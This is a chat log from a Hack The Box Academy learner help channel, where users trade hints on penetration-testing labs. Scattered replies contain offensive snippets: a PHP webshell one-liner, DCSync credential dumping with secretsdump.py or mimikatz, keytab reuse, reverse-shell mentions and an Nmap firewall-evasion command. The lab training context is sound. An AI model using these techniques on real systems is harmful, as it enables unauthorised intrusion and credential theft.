for the exercise in Using Web Proxies - Burp Intruder, am I doing this right? I have .html set as a suffix and am using the same common.txt file they have

I got through SQL Injection Fundamentals all by myself… 😊
If anyone needs help with that module, let me know.

Hey im trying to solve the last question in the Ad skill assesment lab 1 take over the domain and submit clear flag i cant do the dc sync attack and get the hash to take iver the domain

Ivd got the credentials for a another domain user using crackmap i try to use the creds with secretsdump.py

But fails any help??

||V1) Start a powershell shell with the new credentials, then use mimikatz for the Dsync attack
V2) secretsdump.py username:'password'@local_dc_ip ||

secretsdump should work here

They are already in the foothold /etc/hosts

But you'd determine live hosts with a ping sweep usually

The error I generate when I tried to upload the pentestermonkey.php file:

"WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110) "

I dont understand because the listening port and the port number in the pentestermonkey.php file is the same:

this error means something went wrong during execution, I suggest to try a simpler shell first

still stuck here guys, can someone help? I think I found the keytab file but I am unable to crack the ntlm hash, tried crackstation as well as hashcat

still stuck in Broken Aunthentication - Brute-Forcing Password Reset Tokens. I have already brute forced valid tokens, but when I used them on the site or in burp, it is already invalid. am I doing something wrong? can someone give me a hint please? Thank you. 😫

You don't need to crack the password to use a ticket

Or keytab

Just import/use it

The URL is a public url from HTB it is not going to connect your VPN ip. Use webshell

what would be the syntax?
kinit LINUX01@INLANEFREIGHT.HTB -k -t /path
? ima try this, thanks

This

You're not gonna get a revshell from a public target

Me

Does it matter that I am using pwnbox

that is what I am using

Doesn't matter

If you upload a webshell it will be like a website where you can type commands to execute on the host machine

So no it does not matter what you use

Shells and payloads module has some nifty ones they showcase, but nothing beats the classic <?php system($_GET['cmd']); ?>

And on that topic, the file inclusion module showcases using wrappers for obfuscating in a zip/phar

Though that sometimes requires some url encoding to get going

thanks a lot. I got it

So try an approach that doesn't involve attacking machine address

That worked. So this is usually the most effective webshell

For php enabled servers (which is most web servers)

hey guys, why do i keep getting this error?

Initialization Sequence Completed
2024-07-27 07:36:17 Data Channel: cipher 'AES-256-CBC', auth 'SHA256', peer-id: 0, compression: 'lzo'
2024-07-27 07:36:17 Timers: ping 10, ping-restart 120

im using a kali linux virtual machine btw

Re generate the VPN file or try changing the VPN server.
See if it works.
Also look if there is two VPN running at same time.
ps -aux | grep openvpn

that's not an error no? it's normal once it's connected

As long as it says Initialization Sequence Completed it should be good to go

Anyone have any issues setting up the Windows VM on VirtualBox on the setting up module

Having issues where it’s says virtualisation isn’t enabled but it is, everywhere.

changed it in bios?

Bios on the host? Yes

Was already enabled

https://academy.hackthebox.com/achievement/1346583/67

Enable nested, enabled virtualisation, shows its enabled on both host and VM

Literally been trying to sort it for about 2 hours no luck

are you on windows?

indeed

Windows host, on the windows VM module

go to task manager > performance > CPU check virtualisation, if it says enabled then it's enabled in bios

you should be able to run a vm after thta

yeah it shows as enabled on both the Host and the VM

and the vm? wdym? I thought you're setting up a vm

I am on the VM.. when I try to open Ubuntu is when I get the enable virtualization error (on the VM)

domain/user@ip should work

what?

I don't get where you're trying to set up the vm from

Can I DM you

verify and you can post images -> #welcome

Nvm I am just being dumb. For some reason I thought I needed to use Ubuntu on the Windows VM but appears not

I have just wasted nearly 2 hours pulling my hair lol

were you trying to do nested virtualisation?

generally you'd never need to do that

indeed, thanks

I was just being dumb.. I think I need some sleep lol

I just verified anyway, thanku

did someone here do the wordpress module/

Just ask your question. Every module in the Academy has already been completed by several people.

i have this tendency to start and ask a question and get the solution myself a few moments later

You can look for the version of a service if you used -sV option with nmap

Generally tho it's super rare to just do an exploit from Just nmap output

Nope, I'm still having issues.. @next bronze

i d say it is part of your enumeration process. Specific version of a service running on target, is it vulnerable? is there some CVEs you can use, etc

okay wait, what are you trying to do here?

you want to run wsl on your host?

I'm just trying to follow this guide module

It's getting me to run WSL on my VM

but it wont let me

wsl is also a type of vm, if you want to use wsl, install it in your host

https://academy.hackthebox.com/module/87/section/885 Really confusing.. the module talks you through doing it on a VM

I mean it's good to have a windows vm but you don't have to do it now, you can refer to this section later if you find yourself needed one

no worries. I did think this.. I was just wondering if I had to have it set up for further modules

in the skill assessment of the wordpress module there is a question asking from us to download the flag. thing is i cant seem to find a vulnerability regarding a download

Should I follow the guide on my host computer then? install Chocolatey, etc @next bronze

no

I mean I use chocolatey but you don't need it for the path

you can have a windows vm, then use wsl to get a bash shell and linux tools inside of it, that could be practical depending on what you have to do. But i think there is no advantage at installing kali inside a windows vm

i cant run any wsl on the vm

yeah don't do nested vm

enable virtualization error on all

as mentioned wsl is a type of vm so if you wanna use it, install it on your host

sweet

Yo, In Introduction to Windows Command Lines Assessment Section. Any hint or tips to the last task which is ||"What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack?"|| i tried using ||get-winevent|| cmdlet to acquire the specific logs for the specific event id but for finding the account name part is pretty hard for me. i tried to apply the most repeatedly logon failed account name but still it's not right. Any help pls?

Hello everyone one, question 🙋‍♀️
Let’s imagine that my network is hacked, how would I protect my cell phone from being hacked through network?

Don't use the wifi would be my first move.

This is probably a better question for #general though if it's not related to Academy modules.

Ok , sorry I didn’t know

I'm always interested in questions, but you may get better responses elsewhere.

Ok 👌, appreciate

Any hints on what word lists to use in the skills assessment for Active Directory Enumeration & Attacks? no luck with rockyou.txt.

on the Pivoting, Tunneling, and Port Forwarding module, is there a port preference between port 1080 and 9050? can both be used? or is it a socks4 vs sock5 thing? one can only use port 1080 while the other has to use 9050? i've always wondered that...

Yes: Both ports can be used for SOCKS proxies, but they are often chosen based on the application or tool defaults. For example, if you are setting up a general-purpose SOCKS proxy using SSH, you might use port 1080. If you are routing traffic through the Tor network, you would typically use port 9050. Examples:

General SOCKS5 Proxy with SSH:

bash
Copy code
ssh -D 1080 user@remote_host
This sets up a SOCKS5 proxy on port 1080.

thanks! i was getting tired of swapping 9050 for 1080 in the courseware notes....looks like i found a purpose for it now!

chatgpt bro or wormGPT

its not that much of a hassle. ill do it myself

why?

bro just copy and pasting chagpt

i dont understand why?

it's just a default port thing, you can change it up if you want just make sure to specify the right proto

why would i use chatgpt to delete "9050" and replace it with 1080?

ill just give it a try f*** it

only problem with chatgpt in the real world is opsec

learn how to use AI or you will not be employable in the not so distant future

buddy you have no idea what you're talking about

is there an AI module in hackthebox academy?

not at the moment

would be cool though.

they really need to get some!

sudo apt install john should do it

struggling with finding a wordlist to crack the hash from the AD module skills assessment. used rockyou/secLists. seems like a rule based attack would be outside the scope of this module

u can compile it then

i've changed and re generated multiples time. Also, when i run that command i only get one VPN result (my ps aux command)

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Tried switching to TCP?

Hello, I have some question about the footprinting module to anyone who has finished it

struggling with finding a wordlist to crack the hash from the AD module skills assessment. used rockyou/secLists. seems like a rule based attack would be outside the scope of this module

Sorry, I can't really help with content - and I was speaking to @upbeat dew 😉

Would you mind sending me the link? I’ll try to have a look

you can ask your question and someone may help

Sent you via dm

Hi anyone having issues with connecting to OpenVAS in the Vulnerability Assessment module ?

sorry it took some time to ask my question, I made sure that I did not miss anything.

At Footprinting medium lab, I got the 'juicy info' after mounting NFS, after trying to access it via smbclient the password has a special character "!" that makes the smbclient command go "event not found:"

I am trying to do the skill assesment but am not able to connect to OpenVAS with the IP provided, all I get is " The connection has timed out"

I'm really sorry to come back to this but there is no available users that can modify the file on the dacl skill asess concerning ||manuel||.
the folder|| '\SDE01\Shared'|| is not available for writing.
am i supposed to compile an exe and replace Rundll32.exe for real?

ah the port forwarding and tunneling final lab is fun

why not edit it locally

find where it is on the system

there must be somethings i don't understand here but anyway

\SDE01\ is a network path, the file exisits locally

Following through the steps on meterpreter tunneling/port forwarding, still can't get to replicate the results from the module. It's showing that the port is filtered instead of the expected open -- doing this on a newly started pwnbox, no other modifications aside from the ones listed on the module itself:

ok thx

hello in the sqlmap skill assessements i would like to know how to determine that we need to randomize the user agent i find it badly explained in the course i could understand with my research that if we receive an error code 406 or 403 we have to use the --random-agent option but it's not really clear

knowing in the network section just recovers a 200 code with the .php file you want to recover.

I've had my Kali VirtualBox VM configured to Scale to 200% (autoscaled output) and it looks kinda blurry. When I set it to Scale to 100% (unscaled output), it gets really small. How can I increase size of everything without making things blurry?

did you download the virtualbox dependencies with their .iso?

Which dependencies?

I'm not sure since it's been quite a while.

I had installed this VM using Kali's .iso file from their download's page.

C:\Program Files\Oracle\VirtualBox the way to iso

Anyone else having issues RDPing into box on Password Attacks -> Credential Hunting in Windows? I tried earlier and it wasn't working so thought I would give it some time and come back later but still getting the same issue. I'm getting some network errors, looks like the machine spawns but then tries to reconnect a few times and then dies.

were you able to install the dependance contain in the iso ?

You referring to the guest CD additions?

yes

Yeah, done that.

Maybe it's my resolution settings? Cuz the laptop I'm using now has a much higher resolution compared to my previous one.

I had the same problem as you in terms of resolution and this was able to solve my problem.

2880x1620

It doesn't show as an option under virtual screen.

Hi Guys

So I am doing the web proxy challenge and when going to the IP of the target machine I get the ping your IP ok.

When I put in /lucky.php I get Cannot GET /luck.php

Also when I open burpsuite and open the browser within burp suit and go to the target machine I cannot get their it just circle and circle.

Any help would be appreciated.

Many Thanks

Kapz

You using Scale to 100%?

yes

Check this out. It recognizes the size in settings.

So maybe I just need to increase the icon, top bar size, and the system font size?

you tried timeout option ?

Yep I increased it to 60000

can anyone help me with fuff I am getting a lot of error? I'm trying to see what the error are

Just wanted to check if anyone else is experiencing problems so I can work out if it's my issue or an issue with the machine

I don't think so, because I don't have my big screen and I don't have my head setup.

Head setup? I'm not sure I understand what you mean.

ffuf I mean

What error are you getting? If you type ffuf --help it should give you all the command options

I wanted to say that I don't know the configuration of my setup by heart (as I'm not at home), so I couldn't tell you more. All I know is that it was the iso that saved me, try rebooting your machine once you've downloaded the dependencies if you haven't done so.

that's what I'm trying to figure out right now it's just count the error I have tried outputing the errors with -o but that didn't help

Done already. Nothing's worked. I appreciate your help though.

it's just giving me the number of errors

If you are trying to bruteforce then you would expect to see errors because most of your attempts will fail

You can hide the outputs using something like -fs. It's covered in one of the modules, I can't remember which one off the top of my head.

yes but its all errors like thousands

Type ffuf --help and then look at the Filter Options section. That will allow you to filter out all those errors you are getting.

https://academy.hackthebox.com/module/54/section/502

that's I restarted everything now it's working. I know the filter controls it was counting the errors like errors : 35215

I DO NOT UNSDERSTAND WAT DIS SERVER IS ABOUT

I know ffuf I have done the module usually I can look at the error for example if its not connecting to the server or something this was unusual that why I was asking here

iI tried to connect and I think the remote vm has a problem (I remember it was boring this module)

Ah okay, was it not working for you either? Yeah it's a pretty indepth module

Thank you for your help

no problem

This server deals with all topics concerning the company Hack The Box. CTFs, Boxes, Challenges, ProLabs, Academy, etc

read #welcome

I don't know why it's so hard to connect to remote machines.

I didn't have too many issues with the other machines, just for this particular one it keeps giving errors. The IP also didn't change since I tried earlier today so I think maybe it is a problem with that machine. Might just try again tomorrow.

Hello, I would like some guidance with Windows PE, SeDebugPrivilege lab. Can someone give me a nudge in the right direction?

WHAT COMPANY IS THAT AND IS THERE A LINK

Read #welcome

Hi guys, this is a serious question.
I am on the footprinting module, I pass the final tests easy and medium, I ran into the problem that I follow the correct algorithm when solving, but there is always something missing and after 2 hours of torment I still have to look into the solution.
What should I do? under no circumstances do not look at the solution, or if it takes a long time to see a piece of the algorithm, I ask pentesters with experience to tell me how to act in situations when you cannot come to a decision

https://academy.hackthebox.com/module/21/section/132
Why ?
#!/bin/bash
var="nef892na9s1p9asn2aJs71nIsm"
for counter in {1..40}
do
var=$(echo $var | base64)

if [ $counter -eq 35 ]
then
    echo "1 - Number of characters in the 35th encoded value: ${#var}" #1197734
    echo "2 - Number of characters in the 35th encoded value: $(echo $var | wc -c)" #1197735
    echo "3 - Number of characters in the 35th encoded value: $(echo -n $var | wc -c)" #1197734
fi

done

The correct answer is echo 2
i try with 1197734 but it didn't work for me

The password to connect to my box is incorrect. I've typed / copypasted it and it's still refusing connection.

connection refused isn't an auth error

sorry, Permission denied.

need more context like the module etc

I'm doing linux fundementals- I've regenerated the machine twice. The user password combo isn't working for me. I'm using "htb-student" and "HTB_@cademy_stdnt!"

can you show your command

nope. I was going to try respawning my pwnbox but I'm only allowed 1 spawn per day. Fuck this.

ok, without knowing what you used my guess would be you didn't wrap the password in single quotes

I wasn't running it as a single command

you must have ran a command trying to connect in some manner

ssh 10.129.208.254 htb-student

that's not the syntax for ssh

HTB_@cademy_stdnt!

ssh htb-student@ip

🙃

well I can't do anything about it now anyways.

that's ok, now you know

Hey, I've not really more experience than you but if that can help, I'd say it is ok to get stuck and it can be difficult sometimes. 2 hours is not that much time to think about a problem and even more if there is a lot to enumerate. I tend to think this is a part of the game. There is no rush, try to not be pressured by the time it 'should' take to complete a module.
What you should do depends on you. For me the reward of finding a solution beats the pain of not finding it... But that can be stupid sometimes...

Usually taking a break if you are stuck and coming at it later or the next day can give you a fresher mind, looking at the info you got from another perspective. Going back to the course material is also useful. Try to not discard anything without trying. And you can ask questions, what have you missed, have you enumerated enough, did you miss some open ports in your nmap scans. Be sure to get all those open ports, then enumerate each one.

You can also ask for a hint here. Sometimes just writing your question will make you think of a solution.

Thank you very much for your detailed response

Hello, how long does bruteforcing with crowbar usually take? I am on Password attacks skills assessment Hard. it has been running for 15 mins. using mutated passwords.

i think it took me about 15 mins or so? it should be under 30 for sure

Hello guys, I hope all of you are well. I am stuck in the module "Netowrk Enumeration With Nmap", specifically the medium firewall evasion lab. Ihave tried the following command: sudo nmap -sSU -p 53 --script dns-nsid,dns-service-discovery,dns-srv-enum 10.129.120.164 --source-port 53 -Pn -sV -D RND:10 --disable-arp-ping

and I didn't get the flag. I only got this as an output:
PORT STATE SERVICE VERSION
53/tcp filtered domain
53/udp open domain NLnet Labs NSD

I tried many other ways, including -A, and I read online blogs and mimicked their way and still got the same answer. I even reseted the machine and tried again, but I still seem to get a persistent answer. Any help is appreciated

20 mins in

i've heard that using Pwnbox gives different results

alright will try it out, thank you🫡

didn't work sadly

i'm trying on pwnbox.... fingers crossed

I got the flag this way.

yes

it is generally not useful to give the answer of a skill assessment... the goal is to find it, not get it.

sorry, i didnt give him a hint. ima delete it.

sorry for them, not for me : )

no its okay

he didn't give me the answer

my previous command worked immediately on pawnbox

yeah i usually give commands

i don't know how

it's okay thanks for the help

I was told by my friend that somehow pwnbox is allowed to bypass firewall.

in the medium or hard lab, I wasnt able to do nmap scans repeatedly. somehow the ports would get blocked for 5-10 mins.

yes there are alerts, which slow you down, on the contrary, this is a good motivation. But I can't wrap my head around the idea that the same command works on pwnbox and not kali

literally the same, I asked this to my friend. he said its impossible to know without knowing the firewall policy

there is some stuff you can strip off your command and it will still work

oofff, very strange

in the VPS hardening, when editing the jail.conf file in fail2ban, where exactly does it go? There are 2 spots that say [sshd]

i had it from my vm, but after changing the vpn connection file, so i imagine we get banned

guys I am 35 mins in, what do I do?

i think you got a point. Nice observation!

thank you all!

it seems quite like a long time, you are at the start of the assessment?

It seems like the changes could be made in either of these places. I am confused

yes

man I am off to sleep. its 12 30 am. I gotta sleep

yeah got the same headache lol

recheck the assessment intro

what am I doing wrong?

and see if there is anything different with the fields in your command

nah. its correct

anyways, I am stopping it now, screw it

Web Attacks done, Fun and interesting module. Spent way too much time making fancy enumeration scripts but they turned out very useful.

lol yeah i spend a day telling me that. just recheck the username closely when you get back to it

Uh J capital? Idts that would make a difference? That sounds stupid but idts it would?

How do you make enumeration scripts?

A basic version is covered in the module, I just spent some time learning bash scripting and made it better/more flexible.

the contracts script? that was a fun one : )

Try using a different tool.
Take the CIDR notation off the IP. (Not sure if this will make any difference but its not required.)
Use the correct username.
RDP is slow, try a different service.

forest, active, blackfield, reel, sauna but a bit of web
i guess that's the ad track

Okay will try another tool and service tomorrow. But cidr IS required by crowbar. Idk why.

Yeah that was one of them. I had no bash scripting experience so decided to spend a bit of time on it. I made it decode the UIDs, rename files as they were saved and remove any empty files while outputting its progress to the terminal as it was running.

I also made a user enum script that you can easily change the search parameters on so you could potentially use it for various things along with putting out data as it runs.

Defo learned a lot doing it.